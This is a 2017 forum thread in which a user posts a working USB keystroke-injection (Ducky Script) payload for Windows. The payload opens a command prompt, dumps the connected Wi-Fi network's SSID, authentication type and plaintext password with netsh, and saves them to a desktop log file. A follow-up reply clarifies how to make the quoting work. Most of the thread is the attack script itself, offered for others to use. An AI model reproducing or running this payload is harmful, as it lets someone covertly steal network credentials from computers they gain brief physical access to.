RickyHax20 Posted March 11, 2017 Share Posted March 11, 2017 Ok, so here's a payoad that can grab any of the wifi info that the computer is connected to. To find the info once the payload is finished, you need to search for "Log.txt" Only works on Windows DELAY 1000 GUI r DELAY 500 STRING cmd ENTER DELAY 1000REM The @ will be typed as " in the Command prompt STRING cd @%USERPROFILE%\Desktop@ & for /f @tokens=2 delims=: @ %A in ('netsh wlan show interface ^| findstr @SSID@ ^| findstr /v @BSSID@') do set A=%A ENTER DELAY 100 STRING netsh wlan show profiles %A% key=clear | findstr /c:@Network type@ /c:@Authentication@ /c:@Key Content@ | findstr /v @broadcast@ | findstr /v @Radio@>>A.txt ENTER DELAY 100 STRING for /f @tokens=3 delims=: @ %A in ('findstr @Network type@ A.txt') do set B=%A ENTER DELAY 100 STRING for /f @tokens=2 delims=: @ %A in ('findstr @Authentication@ A.txt') do set C=%A ENTER DELAY 100 STRING for /f @tokens=3 delims=: @ %A in ('findstr @Key Content@ A.txt') do set D=%A ENTER DELAY 100 STRING del A.txt ENTER DELAY 100 STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt ENTER Feel free to ask any questions and if there's any errors that need to be fixed on to this. Quote Link to comment Share on other sites More sharing options...
illwill Posted March 11, 2017 Share Posted March 11, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC Quote Link to comment Share on other sites More sharing options...
illwill Posted March 11, 2017 Share Posted March 11, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC Quote Link to comment Share on other sites More sharing options...
RickyHax20 Posted March 11, 2017 Author Share Posted March 11, 2017 Ok, I'll try that soon Quote Link to comment Share on other sites More sharing options...
RickyHax20 Posted March 17, 2017 Author Share Posted March 17, 2017 (edited) On 3/11/2017 at 2:40 PM, illwill said: C:\Users\test>cd @%USERPROFILE%\Desktop@ & for /f @tokens=2 delims=: @ %A in ('netsh wlan show interface ^| findstr @SSID@ ^| findstr /v @BSSID@') do set A=%A 2 was unexpected at this time. You don't put the @ when putting it in the command prompt. You put the @ when creating the ducky script. If the @ symbol is typed in the ducky script when creating the payload, the command prompt will replace every @ to " and vice-versa. That's why I put it in REM in bold " REM The @ will be typed as " in the Command prompt " Edited March 17, 2017 by RickyHax20 additional info Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.